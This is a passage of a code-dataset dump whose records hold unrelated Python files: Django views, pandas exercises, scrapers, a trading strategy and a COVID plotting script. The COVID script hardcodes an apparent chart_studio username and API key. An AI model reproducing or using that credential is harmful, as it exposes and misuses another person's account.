instance):\n request = self.context['request']\n return reverse(\n 'category-detail', args=[instance.slug], request=request)\n\n class Meta:\n model = Category\n fields = ('url', 'slug', 'name', 'channel', 'parent')\n","sub_path":"work-at-olist/workatolist/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"265658228","text":"import codecademylib\nimport pandas as pd\n\nad_clicks = pd.read_csv('ad_clicks.csv')\nprint(ad_clicks.head(10))\n\nviews_source = ad_clicks.groupby(['utm_source']).user_id.count().reset_index()\nprint(views_source)\n\nad_clicks['is_click'] = ~ad_clicks.ad_click_timestamp.isnull()\n\nclicks_by_source = ad_clicks.groupby(['utm_source','is_click']).user_id.count().reset_index()\nprint(clicks_by_source)\n\nclicks_pivot = clicks_by_source.pivot(index='utm_source',columns='is_click',values='user_id').reset_index()\nprint(clicks_pivot)\n\nclicks_pivot['percent_clicked'] = 
clicks_pivot[True]/(clicks_pivot[True]+clicks_pivot[False])\nprint(clicks_pivot)\n\nexperimental_group_count = ad_clicks.groupby(['experimental_group']).user_id.count().reset_index()\nprint(experimental_group_count)\n\nclicks_by_experimental = ad_clicks.groupby(['experimental_group','is_click']).user_id.count().reset_index()\nprint(clicks_by_experimental)\n\nclicks_by_experimental_pivot = clicks_by_experimental.pivot(index='experimental_group',columns='is_click',values='user_id').reset_index()\n\nclicks_by_experimental_pivot['percent_clicked'] = clicks_by_experimental_pivot[True]/(clicks_by_experimental_pivot[True]+clicks_by_experimental_pivot[False])\nprint(clicks_by_experimental_pivot)\n\na_clicks = ad_clicks[ad_clicks.experimental_group == 'A'].reset_index()\nb_clicks = ad_clicks[ad_clicks.experimental_group == 'B'].reset_index()\n\na_clicks_count = a_clicks.groupby(['is_click','day']).user_id.count().reset_index()\na_clicks_pivot = a_clicks_count.pivot(index='day',columns='is_click',values='user_id').reset_index()\na_clicks_pivot['percent_clicked'] = a_clicks_pivot[True]/(a_clicks_pivot[True]+a_clicks_pivot[False])\nprint(a_clicks_pivot)\n\nb_clicks_count = b_clicks.groupby(['is_click','day']).user_id.count().reset_index()\nb_clicks_pivot = b_clicks_count.pivot(index='day',columns='is_click',values='user_id').reset_index()\nb_clicks_pivot['percent_clicked'] = b_clicks_pivot[True]/(b_clicks_pivot[True]+b_clicks_pivot[False])\nprint(b_clicks_pivot)","sub_path":"pandas/aggregates_in_pandas.py","file_name":"aggregates_in_pandas.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"220657023","text":"#Exercise 5: Write a program to read through the mail box data and when you find line that starts with \"From\", you will split the line into words using the split function. 
We are interested in who sent the message, which is the second word on the From line.\n#From stephen.marquard@uct.ac.za Sat Jan 5 09:14:16 2008\n#You will parse the From line and print out the second word for each From line, then you will also count the number of From (not From:) lines and print out a count at the end.\n\nfname=input(\"Enter name of file\")\nfopen=open(fname)\ncount=0\nfor line in fopen:\n    # match \"From \" with a trailing space so \"From:\" header lines are not counted\n    if line.startswith(\"From \") :\n        count=count+1\n        split=line.split()\n        print(split[1])\nprint(count)\n","sub_path":"list3.py","file_name":"list3.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"105294933","text":"# -*- coding: utf-8 -*-\n\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\n\nimport json, time, datetime\nfrom datetime import date\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n# Respond to GET ~/keyboard/ requests with the button list\ndef keyboard(request):\n    return JsonResponse({\n        'type': 'buttons',\n        'buttons': ['조식', '중식', '석식', '내일의 조식', '내일의 중식', '내일의 석식']\n    })\n\n# Exempt from CSRF token checks; return the message response for POST requests\n@csrf_exempt\ndef message(request):\n    json_str = ((request.body).decode('utf-8'))\n    received_json_data = json.loads(json_str)\n    meal = received_json_data['content']\n\n    daystring = [\"월\", \"화\", \"수\", \"목\", \"금\", \"토\", \"일\"]\n    today = datetime.datetime.today().weekday()\n\n    nextdaystring = [\"화\", \"수\", \"목\", \"금\", \"토\", \"일\", \"월\"]\n\n    today_date = datetime.date.today().strftime(\"%m월 %d일 \")\n    tomorrow_date = date.fromtimestamp(time.time() + 60 * 60 * 24).strftime(\"%m월 %d일 \")\n\n    if meal == '조식' or meal == '중식' or meal == '석식':\n        return JsonResponse({\n            'message': {\n                'text': today_date + daystring[today] + '요일 ' + meal + ' 메뉴입니다. \\n \\n' + crawl(request)\n            },\n            'keyboard': {\n                'type': 'buttons',\n                'buttons': ['조식', '중식', '석식', '내일의 조식', '내일의 중식', '내일의 석식']\n            }\n        })\n    if meal == '내일의 조식' or meal == '내일의 중식' or meal == '내일의 석식':\n        return JsonResponse({\n            'message': {\n                'text': '[' + meal + '] \\n' + tomorrow_date + nextdaystring[today] + '요일 급식 메뉴입니다. \\n \\n' + crawl(request)\n            },\n            'keyboard': {\n                'type': 'buttons',\n                'buttons': ['조식', '중식', '석식', '내일의 조식', '내일의 중식', '내일의 석식']\n            }\n        })\n\n# Crawl the cafeteria menu whenever a message request arrives\ndef crawl(request):\n    import urllib.request\n    from bs4 import BeautifulSoup\n\n    json_str = ((request.body).decode('utf-8'))\n    received_json_data = json.loads(json_str)\n    meal = received_json_data['content']\n\n    # Edit these codes when using this for another school\n    regioncode = 'gne.go.kr'\n    schulcode = 'S100000747'\n\n    if meal == '조식' or meal == '내일의 조식':\n        sccode = 1\n    if meal == '중식' or meal == '내일의 중식':\n        sccode = 2\n    if meal == '석식' or meal == '내일의 석식':\n        sccode = 3\n\n    # Parse the menu from NEIS
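# NEIS keys the meal page on the regional office domain (regioncode), the\n    # school code (schulcode) and schMmealScCode, where 1 = breakfast,\n    # 2 = lunch and 3 = dinner, so the URL below is assembled from those values.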
    url = ('http://stu.' + regioncode + '/sts_sci_md01_001.do?schulCode=' + schulcode + '&schulCrseScCode=4&schulKndScCode=04&schMmealScCode=' + str(sccode))\n\n    try:\n        source = urllib.request.urlopen(url, timeout=3)\n    except Exception as e:\n        logger.error(e)\n        menu = '급식 정보를 가져오는 중 문제가 발생하였습니다.\\n관리자에게 연락바랍니다.'\n    else:\n        # Parse as utf-8 with beautifulsoup4 using the lxml parser\n        soup = BeautifulSoup(source, \"lxml\", from_encoding='utf-8')\n\n        # Find every table inside div id=\"contents\", then pull out only the td tags\n        table_div = soup.find(id=\"contents\")\n        tables = table_div.find_all(\"table\")\n        menu_table = tables[0]\n        td = menu_table.find_all('td')\n\n        # Weekday index: Monday ~ Sunday = 0 ~ 6\n        today = datetime.datetime.today().weekday()\n\n        # Monday ~ Sunday map to td[8] ~ td[14]\n        if meal == '조식' or meal == '중식' or meal == '석식':\n            if today == 6:\n                menu = '일요일'\n            else:\n                menu = td[today + 8]\n\n        if meal == '내일의 조식' or meal == '내일의 중식' or meal == '내일의 석식':\n            if today == 5:\n                menu = '일요일'\n            elif today == 6:\n                menu = td[8]\n            else:\n                menu = td[today + 9]\n\n        # Strip leftover tag debris after parsing\n        menu = str(menu).replace('*', '').replace('<td>', '').replace('</td>', '').replace('<td class=\"textC last\">', '').replace('<td class=\"textC\">', '').replace('<br/>
', '\\n').replace('1.', '').replace('2.', '').replace('3.', '').replace('4.', '').replace('5.', '').replace('6.', '').replace('7.', '').replace('8.', '').replace('9.', '').replace('10.', '').replace('11.', '').replace('12.', '').replace('13.', '').replace('14.', '').replace('15.', '').replace('1', '').replace(' ', '')\n\n if menu == '':\n menu = '급식 정보가 존재하지 않습니다.\\n급식이 없는 날일 수 있으니 확인 바랍니다.'\n\n if menu == '일요일':\n menu = '일요일은 급식이 제공되지 않습니다.'\n\n return menu","sub_path":"hyoammeal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167932600","text":"import logging\nimport copy\nimport random\nimport itertools\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import redirect, get_object_or_404\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\nfrom annoying.decorators import render_to\n\nfrom webapp.apps.exchange.forms import ExchangeForm, UserExchangeForm, UserExchangeExclusionForm\nfrom webapp.apps.exchange.models import Exchange, UserExchangeExclusion\n\nlogger = logging.getLogger(__name__)\n\n@render_to('exchange/list.html')\n@login_required\ndef exchange_list(request):\n user_exchanges = request.user.userexchange_set.all()\n return {'user_exchanges': user_exchanges}\n\n\n@render_to('exchange/create.html')\n@login_required\ndef create(request):\n\n if request.method == 'POST':\n form = ExchangeForm(request.POST)\n\n if form.is_valid():\n exchange = form.save(user=request.user)\n return redirect('exchange-list')\n else :\n form = ExchangeForm()\n\n return {'form': form}\n\n\n@render_to('exchange/edit.html')\n@login_required\ndef edit(request, exchange_id):\n\n exchange = get_object_or_404(Exchange, pk=exchange_id)\n\n if request.method == 'POST':\n form = ExchangeForm(request.POST, instance=exchange)\n\n if form.is_valid():\n exchange = form.save(user=request.user)\n return redirect('exchange-list')\n else :\n form = ExchangeForm(instance=exchange)\n\n user_exchanges = exchange.userexchange_set.all()\n user_exchange_exclusions = UserExchangeExclusion.objects.filter(exchange=exchange)\n\n return {\n 'form': form,\n 'exchange': exchange,\n 'user_exchanges': user_exchanges,\n 'user_exchange_exclusions': user_exchange_exclusions\n }\n\n\n@login_required\ndef start(request, exchange_id):\n\n exchange = get_object_or_404(Exchange, pk=exchange_id)\n\n if request.method == 'POST':\n\n user_exchanges = exchange.userexchange_set.all()\n user_exchange_exclusions = UserExchangeExclusion.objects.filter(exchange=exchange)\n\n all = copy.deepcopy(list(user_exchanges))\n targets = copy.deepcopy(all)\n random.shuffle(targets)\n\n target_permutations = itertools.permutations(targets)\n found = False\n i = 0\n for permutation in target_permutations:\n i = i + 1\n if validate(all, permutation, user_exchange_exclusions):\n for person, target in zip(all, permutation):\n logger.info(\"%s -> %s\" % (person, target));\n person.target = target.user\n person.save()\n\n subject = exchange.name\n\n if exchange.state == Exchange.STARTED:\n subject = subject + \" - Re-generated\"\n\n if target.user.first_name and target.user.last_name:\n body = \"Get a gift for: %s %s (%s)\" % (target.user.first_name, target.user.last_name, target.user.email)\n else:\n body = \"Get a gift for: %s\" % target.user.email\n\n email_from = settings.EMAIL_FROM\n email_to = person.user.email\n send_mail(subject, body, email_from, [email_to], 
fail_silently=False)\n\n                found = True\n                break\n\n        logger.info(\"Checked %d permutations\" % i)\n\n        if not found:\n            raise Exception(\"Can't start exchange, could not compute cycle\")\n\n        exchange.state = Exchange.STARTED\n        exchange.save()\n\n        return redirect('exchange-list')\n\n    else :\n        return redirect('exchange-list')\n\n\ndef validate(all, targets, user_exchange_exclusions):\n    for person, target in zip(all, targets):\n        if person == target:\n            return False\n        for exclusion in user_exchange_exclusions:\n            if person == exclusion.user_exchange1 and target == exclusion.user_exchange2:\n                return False\n    return True\n\n\n@login_required\ndef delete(request, exchange_id):\n\n    exchange = get_object_or_404(Exchange, pk=exchange_id)\n    exchange.delete()\n\n    return redirect('exchange-list')\n\n\n@render_to('exchange/user/create.html')\n@login_required\ndef create_user_exchange(request, exchange_id):\n\n    exchange = get_object_or_404(Exchange, pk=exchange_id)\n\n    if request.method == 'POST':\n        form = UserExchangeForm(request.POST)\n\n        if form.is_valid():\n            user_exchange = form.save(exchange=exchange)\n            return redirect('exchange-edit', exchange.id)\n    else :\n        form = UserExchangeForm()\n\n    return {'form': form, 'exchange': exchange}\n\n\n@render_to('exchange/user/exclusion/create.html')\n@login_required\ndef create_user_exchange_exclusion(request, exchange_id):\n\n    exchange = get_object_or_404(Exchange, pk=exchange_id)\n    user_exchanges = exchange.userexchange_set.all()\n\n    if request.method == 'POST':\n        form = UserExchangeExclusionForm(user_exchanges, request.POST)\n\n        if form.is_valid():\n            user_exchange_exclusion = form.save(exchange=exchange)\n            return redirect('exchange-edit', exchange.id)\n    else :\n        form = UserExchangeExclusionForm(user_exchanges)\n\n    return {'form': form, 'exchange': exchange}\n","sub_path":"webapp/apps/exchange/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"544116689","text":"import pandas as pd\nimport os\nimport sys\n\nhtml_template = \"\"\"\n<!DOCTYPE html>\n<html>\n<head>\n    <meta charset=\"utf-8\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n    <link rel=\"stylesheet\" href=\"https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css\">\n</head>\n<body>\n    <div class=\"container\">\n    {table}\n    </div>\n</body>\n</html>\n\"\"\"
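# DataFrame.to_html fills the {table} placeholder with the rendered table;\n# escape=False below keeps the <img> tags added to the image columns from\n# being escaped to literal text, so the linked images render in the report.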
\n\nargs = sys.argv\n\nif len(args) == 2:\n    print(\"First argument: \" + args[1])\n    current_dir = os.path.dirname(os.path.abspath(__file__))\n    project_root_path = os.path.dirname(current_dir)\n    test_data_parent_path = os.path.join(project_root_path, \"data\", args[1])\n    print(test_data_parent_path)\n    estimation_result_path = os.path.join(test_data_parent_path, \"estimation\")\n    if os.path.exists(os.path.join(estimation_result_path, \"comparison.csv\")):\n        print('Comparison csv data found')\n    else:\n        print('No comparison csv data found')\n        quit()\nelse:\n    print('Specify the test target folder in the following form')\n    print('$ python html_convert.py <test target folder>')\n    quit()\n\npd.set_option(\"display.max_colwidth\", 120)\ndf = pd.read_csv(os.path.join(estimation_result_path, \"comparison.csv\"))\n\n# Convert each image path column into an <img> tag string\ndf[\"img_path\"] = df[\"img_path\"].map(lambda s: \"<img src='{0}'>\".format(s))\ndf[\"estimation_pixels\"] = df[\"estimation_pixels\"].map(lambda s: \"<img src='{0}'>\".format(s))\ndf[\"correct_pixels\"] = df[\"correct_pixels\"].map(lambda s: \"<img src='{0}'>\".format(s))\ndf[\"roi\"] = df[\"roi\"].map(lambda s: \"<img src='{0}'>\".format(s))\ntable = df.to_html(classes=[\"table\", \"table-bordered\", \"table-hover\"], escape=False)\nhtml = html_template.format(table=table)\n\nwith open(\"test.html\", \"w\") as f:\n    f.write(html)","sub_path":"tool/html_convert.py","file_name":"html_convert.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"533876175","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport plotly.io as pio\nimport chart_studio\nimport chart_studio.plotly as py\nchart_studio.tools.set_credentials_file(username='daniel.reiff', api_key='jhEpBS6888O1FEbZI8M4')\n\n\nclass World(object):\n\n    def __init__(self, df):\n        self.df = df\n        self.transpose_df()\n\n    def transpose_df(self):\n        countryAgg = self.df.drop(columns=['Lat', 'Long']).groupby('Country/Region').sum().reset_index()\n        self.df = countryAgg.set_index('Country/Region').stack().reset_index(level=1).reset_index().rename(columns={'level_1': 'Date', 0:'Confirmed'})\n\n    def _addCountry(self, country, fig, i):\n        df = self.df[self.df['Country/Region'] == country]\n        df['NewCases'] = df.Confirmed.diff()\n        df = df.fillna(0)\n        df['NewCasesInLastWeek'] = df['NewCases'].rolling(7).sum()\n        df = df.fillna(0)\n        df[\"Date\"] = df[\"Date\"].apply(lambda x: x.replace(\"/20\", \"\"))\n        fig.add_trace(go.Scatter(x=np.log(df['Confirmed']), y=np.log(df['NewCasesInLastWeek']), text=df['Date'], mode='lines+markers', name=country), row=1, col=2)\n        fig.add_trace(go.Scatter(x=df[\"Date\"], y=df[\"Confirmed\"], text=df['Date'], mode='lines+markers', name=country), row=i+1, col=1)\n        if country == 'Korea, South':\n            fig.add_trace(go.Scatter(x= np.log(df[df['Date'] == '3/4'][\"Confirmed\"]), y = np.log(df[df['Date'] == '3/4'][\"NewCasesInLastWeek\"]), name=\"Inflection Point\"), row=1, col=2)\n            fig.add_trace(go.Scatter(x= df[df['Date'] == '3/4']['Date'], y = df[df['Date'] == '3/4'][\"Confirmed\"], name=\"Inflection Point\"), row=2, col=1)\n\n    def plotCountries(self, countries, filename):\n        titles = [\"{} Logistic Curve\".format(country) for country in countries]\n        titles.insert(1, \"Existing Cases vs. 
New Cases\")\n fig = make_subplots(\n rows=3, cols=2,\n specs=[[{}, {\"rowspan\":3}],\n [{}, None],\n [{}, None]],\n subplot_titles=titles)\n\n for i, country in enumerate(countries):\n # print(i)\n self._addCountry(country, fig, i)\n fig.update_layout(\n title=\"Coronavirus in Countries: Confirmed Growth\",\n xaxis_title=\"Log(Confirmed Cases)\",\n yaxis_title=\"Log(Total New Cases in Last Week)\",\n )\n\n py.iplot(fig, filename = filename)\n\n\n\nif __name__ == '__main__':\n df = pd.read_csv('../local_data/time_series_covid19_confirmed_global.csv')\n comparison = World(df)\n comparison.plotCountries([\"US\", \"Korea, South\", \"Italy\"], filename)\n","sub_path":"src/World_Coronavirus_Analysis.py","file_name":"World_Coronavirus_Analysis.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99714793","text":"#https://leetcode.com/problems/word-ladder/discuss/473774/python-two-end-solution-100ms\nfrom typing import List\nfrom collections import defaultdict\nimport sys\n\ndef timeit(func):\n def wrapped(*args, **kwargs):\n start = time.time()\n ret = func(*args, **kwargs)\n elapsed = time.time() - start\n print(\"elapsed: %s\" % elapsed)\n return ret\n return wrapped\n\nfrom collections import defaultdict\nimport time\n\n\n\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n def is_range(matrix, i, j):\n N = len(matrix)\n M = len(matrix[0])\n if i < 0 or i >= N: return False\n if j < 0 or j >= M: return False\n return True\n\n def validate(matrix, h, w, length):\n for n in range(length):\n for m in range(length):\n i, j = h + n, w + m\n if matrix[i][j] != 1:\n return False\n return True\n\n def get_max_square(matrix, x, y):\n counter = 0\n i, j = x, y\n while is_range(matrix, i, j) and matrix[i][j] == 1:\n if validate(matrix, x, y, counter):\n counter += 1\n i += 1\n j += 1\n return counter ** 2\n\n def solve(matrix: List[List[int]]) -> int:\n N = len(matrix)\n if N == 0: return 0\n M = len(matrix[0])\n maxi = 0\n for i in range(N):\n for j in range(M):\n local = get_max_square(matrix, i, j)\n maxi = max(local, maxi)\n return maxi\n matrix2 = [list(map(int, row)) for row in matrix]\n return solve(matrix2)\n\n\n\nsamples = [\n (\n [1, 0, 1, 0, 0],\n [1, 0, 1, 1, 1],\n [1, 1, 1, 1, 1],\n [1, 0, 0, 1, 0],\n )\n\n]\nfor S in samples:\n ans = Solution().maximalSquare(S)\n print(ans)\n","sub_path":"lc/mdm/20200204_mdm_221_maximal_square.py","file_name":"20200204_mdm_221_maximal_square.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"391287097","text":"import numpy as np\nimport pandas as pd\nfrom math import log\n#import os\n\ndef meb(x, a, b, c):\n # return the membership of PL,PM,PS,AZ,NS,NM,NL\n # x is return , a, b, c is the boundary of the membership\n if x <= a:\n return 0.0\n if (x > a) and (x <= b):\n return (x-a)/(b-a)\n if (x > b) and (x <= c):\n return (c-x)/(c-b)\n if x > c:\n return 0.0\n if a == b:\n if x <= b:\n return 1.0\n if (x > b) and (x <= c):\n return(c-x)/(c-b)\n if x > c:\n return 0.0\n if b == c:\n if x <= a:\n return 0.0\n if (x > a) and (x <= b):\n return (x-a)/(b-a)\n if x > b:\n return 1.0\n\ndef init(context):\n logger.info(\"init\")\n context.s1 = \"002032.XSHE\"\n #if instruments(context.s1).days_from_listed(date=None)<366:\n #os._exit()\n update_universe(context.s1)\n # 是否已发送了order\n context.fired = False\n context.P = np.matrix('10 0;0 10')\n 
context.c=0.01\n context.lmd=0.9\n context.aa = pd.DataFrame(np.zeros([1, 2]), columns=[0, 1])\n #print(aa)\n #context.c = 0.01\n\ndef before_trading(context):\n c=context.c\n lmd=context.lmd\n P = context.P\n aa = context.aa.tail(1)\n aai = np.matrix(aa).T\n try:\n numerator = history_bars(context.s1, 1, '1d', 'close').mean()\n denominator = history_bars(context.s1, 5, '1d', 'close').mean()\n tmp = history_bars(context.s1, 2, '1d', 'close')\n r = log(tmp[1]/tmp[0])\n avg_return = log(numerator/denominator)\n y1 = meb(avg_return, 0, c, 2 * c)\n y2 = meb(avg_return, c, 2 * c, 3 * c)\n y3 = meb(avg_return, 2 * c, 3 * c, 3 * c)\n y4 = meb(avg_return, -2 * c, -c, 0)\n y5 = meb(avg_return, -3 * c, -2 * c, -c)\n y6 = meb(avg_return, -3 * c, -3 * c, -2 * c)\n y7 = meb(avg_return, -c, 0, c)\n ya = y1 + y2 + y3 + y7\n yb = y4 + y5 + y6 + y7\n #print(ya,yb)\n if ya==0:\n ed6=0\n else:\n ed6 = (0.1 * y1 + 0.2 * y2 + 0.4 * y3) / ya\n if yb==0:\n ed7=0\n else:\n ed7 = (0.1 * y4 + 0.2 * y5 + 0.4 * y6) / yb\n #print(ed6,ed7)\n X = np.matrix([[ed6],[ed7]])\n K = P * X / (X.T * P * X - lmd)\n aat = (aai + K * (r - X.T * aai)).T\n context.P = (P - K * X.T * P) / lmd\n #print(context.aa.append(pd.DataFrame(aat), ignore_index=True))\n context.aa=context.aa.append(pd.DataFrame(aat), ignore_index=True) \n except Exception:\n print(\"error while updating the RLS estimate\")\n #print(tmp)\n \ndef handle_bar(context, bar_dict):\n\n # write your main algorithm logic here\n\n # bar_dict[order_book_id] gives the bar data of a security\n # context.portfolio gives the current portfolio state\n\n # use the order_shares(id_or_ins, amount) method to place orders\n # TODO: write your algorithm here!\n aa = context.aa.tail(1)\n print(\"im running\")\n if aa.iloc[0,0]>0:\n # order_percent with 1 buys the stock up to 100% of the portfolio\n order_percent(context.s1, 0.2)\n #context.fired = True\n else:\n order_percent(context.s1, -0.5)","sub_path":"FBB.py","file_name":"FBB.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"27823218","text":"'''2. 
Write a program which contains one class named as Circle.\nCircle class contains three instance variables as Radius ,Area, Circumference.\nThat class contains one class variable as PI which is initialise to 3.14.\nInside init method initialise all instance variables to 0.0.\nThere are three instance methods inside class as Accept(), CalculateArea(),\nCalculateCircumference(), Display().\nAccept method will accept value of Radius from user.\nCalculateArea() method will calculate area of circle and store it into instance variable Area.\nCalculateCircumference() method will calculate circumference of circle and store it into instance\nvariable Circumference.\nAnd Display() method will display value of all the instance variables as Radius , Area,\nCircumference.\nAfter designing the above class call all instance methods by creating multiple objects.'''\n\n\nclass Circle:\n PI = 3.14;\n\n def __init__(self):\n self.radius = 0.0;\n self.area = 0.0\n self.cer = 0.0\n\n def Accept(self):\n print(\"Enter the value\")\n self.radius = float(input())\n\n def Area(self):\n self.area = self.PI * self.radius ** 2;\n\n def Circumference(self):\n self.cer = self.PI * self.radius * 2;\n\n def Display(self):\n print(\"area is{0}\\n circumference is{1}\".format(self.area, self.cer))\n\n\ndef main():\n obj1 = Circle()\n obj2 = Circle()\n obj3 = Circle()\n obj4 = Circle()\n\n obj1.Accept()\n obj1.Area()\n obj1.Circumference()\n obj1.Display()\n\n obj2.Accept()\n obj2.Area()\n obj2.Circumference()\n obj2.Display()\n\n obj3.Accept()\n obj3.Area()\n obj3.Circumference()\n obj3.Display()\n\n obj4.Accept()\n obj4.Area()\n obj4.Circumference()\n obj4.Display()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"A2.py","file_name":"A2.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"187045953","text":"# -*- coding: utf-8 -*-\nimport logging\nimport scrapy\n\nfrom ..items import OoxxItem, OoxxItemLoader\nfrom scrapy.shell import inspect_response\nfrom scrapy.settings import default_settings\n\n\nclass OoxxSpider(scrapy.Spider):\n name = 'wuliao'\n allowed_domains = ['jandan.net']\n start_urls = ['http://jandan.net/pic']\n\n def parse(self, response):\n # fetch current page's all li elements\n for item_selector in response.css('ol.commentlist > li[id^=\"comment-\"]'):\n # fill the item data\n item = OoxxItemLoader(item=OoxxItem(),\n selector=item_selector,\n response=response)\n # author name field\n item.add_css('author_name', 'div.author > strong::text')\n\n # img url\n item.add_css('pic_url', 'div.text > p > a.view_img_link::attr(href)')\n\n # public date text description\n item.add_css('pub_date', 'div.author > small > a::text')\n\n yield item.load_item()\n\n # follow next page\n # CLOSESPIDER_PAGECOUNT=2\n next_page_selector = response.css('div.cp-pagenavi > a.previous-comment-page::attr(href)')\n if next_page_selector:\n # self.log(response.urljoin(next_page_selector.extract_first()), logging.INFO)\n yield scrapy.Request(response.urljoin(next_page_selector.extract_first()))\n","sub_path":"jandan/jandan/spiders/wuliao.py","file_name":"wuliao.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"6716113","text":"# -*- coding: UTF-8 -*-\nimport re\n\nfrom DeBar.classes import Text\nfrom DeBar.classes import Variaveis\n\n\nclass Telefone(Variaveis):\n\n def __init__(self, telefone):\n super(Telefone, self).__init__()\n 
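# validation is delegated to setValor; the Variaveis base class is\n # assumed to provide the valor, isvalido and mensagem attributes that\n # setValor and validaDDD fill in below\n 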
self.setValor(telefone)\n\n def setValor(self, telefone):\n\n if telefone:\n self.valor = telefone\n if self.valor[0:1] == '0':\n self.valor = self.valor[1:]\n\n self.valor = re.sub(\"[(-)]\", \"\", self.valor)\n self.valor = self.valor.replace(\" \", \"\")\n\n if self.valor:\n try:\n int(self.valor)\n except ValueError:\n self.mensagem = Text().apenas_numeros(self.__class__.__name__)\n\n if len(self.valor) == 10 or len(self.valor) == 11:\n self.validaDDD()\n else:\n self.mensagem = Text().dado_invalido(self.__class__.__name__)\n else:\n self.mensagem = Text().dado_invalido(self.__class__.__name__)\n else:\n self.mensagem = Text().dado_invalido(self.__class__.__name__)\n\n def validaDDD(self):\n\n ddds = {11,12,13,14,15,16,17,18,19,21,22,\n 24,27,28,31,32,33,34,35,37,38,41,\n 42,43,44,45,46,47,48,49,51,53,54,\n 55,61,62,63,64,65,66,67,68,69,71,\n 73,74,75,77,79,81,82,83,84,85,86,\n 87,88,89,91,92,93,94,95,96,97,98,99}\n\n ddd = self.valor[0:2]\n\n try:\n ddd = int(ddd)\n except ValueError:\n self.mensagem = Text().apenas_numeros(\"DDD\")\n\n if ddd in ddds:\n self.isvalido = True\n else:\n self.mensagem = Text().dado_invalido(\"DDD\")\n","sub_path":"DeBar/classes/usuario/telefone.py","file_name":"telefone.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623049082","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport copy\nimport itertools\n\nimport en_core_web_sm as model\nimport plac\n\nfrom ..io import read_jsonl, write_jsonl\nfrom ..logger import logger\n\n\nclass ReachToProdigy:\n \"\"\"\n Converts json of scraped reference section into prodigy style json.\n\n The resulting json can then be loaded into prodigy if required.\n\n Expects dict in the following format:\n\n ```\n {\n ...,\n \"sections\": {\n \"Reference\": \"References\\n1. Upson. M. 
(2018) ...\"\n }\n }\n\n ```\n\n Returns references in the following format:\n\n ```\n [{\n 'text': ' This is an example with a linebreak\\n',\n 'meta': {'doc_hash': None, 'provider': None, 'line_number': 3},\n 'tokens': [\n {'text': ' ', 'start': 0, 'end': 1, 'id': 0},\n {'text': 'This', 'start': 1, 'end': 5, 'id': 1},\n {'text': 'is', 'start': 6, 'end': 8, 'id': 2},\n {'text': 'an', 'start': 9, 'end': 11, 'id': 3},\n {'text': 'example', 'start': 12, 'end': 19, 'id': 4},\n {'text': 'with', 'start': 20, 'end': 24, 'id': 5},\n {'text': 'a', 'start': 25, 'end': 26, 'id': 6},\n {'text': 'linebreak', 'start': 27, 'end': 36, 'id': 7},\n {'text': '\\n', 'start': 36, 'end': 37, 'id': 8}]\n },\n ...\n ]\n\n ```\n \"\"\"\n\n def __init__(\n self, ref_sections, lines=10, split_char=\"\\n\", add_linebreak=True, join_char=\" \"\n ):\n \"\"\"\n Args:\n ref_sections(list): List of dicts extracted in scrape.\n lines(int): Number of lines to combine into one chunk\n split_char(str): Character to split lines on.\n add_linebreak(bool): Should a linebreak be re-added so that it is\n clear where a break was made?\n join_chars(str): Which character will be used to join lines at the\n point which they are merged into a chunk.\n \"\"\"\n\n self.ref_sections = ref_sections\n self.lines = lines\n self.split_char = split_char\n self.add_linebreak = add_linebreak\n self.join_char = join_char\n\n self.nlp = model.load()\n\n def run(self):\n \"\"\"\n Main method of the class\n \"\"\"\n\n prodigy_format = []\n\n for i, refs in enumerate(self.ref_sections):\n\n one_record = self.one_record_to_prodigy_format(\n refs,\n self.nlp,\n self.lines,\n self.split_char,\n self.add_linebreak,\n self.join_char,\n )\n\n # If something is returned (i.e. there is a ref section)\n # then append to prodigy_format.\n\n if one_record:\n\n prodigy_format.append(one_record)\n\n out = list(itertools.chain.from_iterable(prodigy_format))\n\n logger.info(\"Returned %s reference sections\", len(out))\n\n return out\n\n def one_record_to_prodigy_format(\n self,\n input_dict,\n nlp,\n lines=10,\n split_char=\"\\n\",\n add_linebreak=True,\n join_char=\" \",\n ):\n \"\"\"\n Convert one dict produced by the scrape to a list of prodigy dicts\n\n Args:\n input_dict(dict): One reference section dict from the scrape\n nlp: A spacy model, for example loaded with spacy.load(\"en_core_web_sm\")\n lines(int): Number of lines to combine into one 